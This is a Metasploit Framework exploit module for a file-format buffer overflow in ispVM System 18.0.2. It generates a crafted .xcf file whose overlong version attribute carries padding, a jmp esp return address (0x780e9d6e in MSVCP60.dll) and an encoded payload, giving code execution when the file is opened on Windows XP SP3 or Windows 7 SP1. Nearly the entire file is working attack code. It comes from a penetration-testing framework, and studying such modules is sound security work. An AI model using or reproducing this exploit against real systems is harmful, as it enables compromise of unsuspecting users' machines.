##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info={})
		super(update_info(info,
			'Name'           => "ispVM System XCF File Handling Overflow",
			'Description'    => %q{
					This module exploits a vulnerability found in ispVM System 18.0.2.  Due to the way
				ispVM handles .xcf files, it is possible to cause a buffer overflow with a specially
				crafted file, when a long value is supplied for the version attribute of the ispXCF
				tag. It results in arbitrary code execution under the context of the user.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Unknown', # Vulnerability Discovery
					'juan vazquez' # Metasploit
				],
			'References'     =>
				[
					['OSVDB', '82000'],
					['BID', '53562'],
					['URL', 'http://secunia.com/advisories/48740/']
				],
			'Payload'        =>
				{
					'Space'    => 4000,
					'BadChars' => "\x00\x1a\x3c\x20\x3e\xff"
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "process",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1',
						{
							'Offset' => 274,
							'BreakOffset' => 243,
							'Ret' => 0x780e9d6e # jmp esp from C:\ispTOOLS\ispvmsystem\MSVCP60.dll
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => "May 16 2012",
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'msf.xcf']),
			], self.class)

	end

	def exploit

		buf = rand_text(target['Offset'])
		buf[target['BreakOffset']] = "A"
		buf << [target.ret].pack("V")
		buf << payload.encoded

		xcf = %Q|
		<?xml version='1.0' encoding='utf-8' ?>
		<!DOCTYPE		ispXCF	SYSTEM	"IspXCF.dtd" >
		<ispXCF version="#{buf}">
		</ispXCF>
		|

		file_create(xcf)
	end
end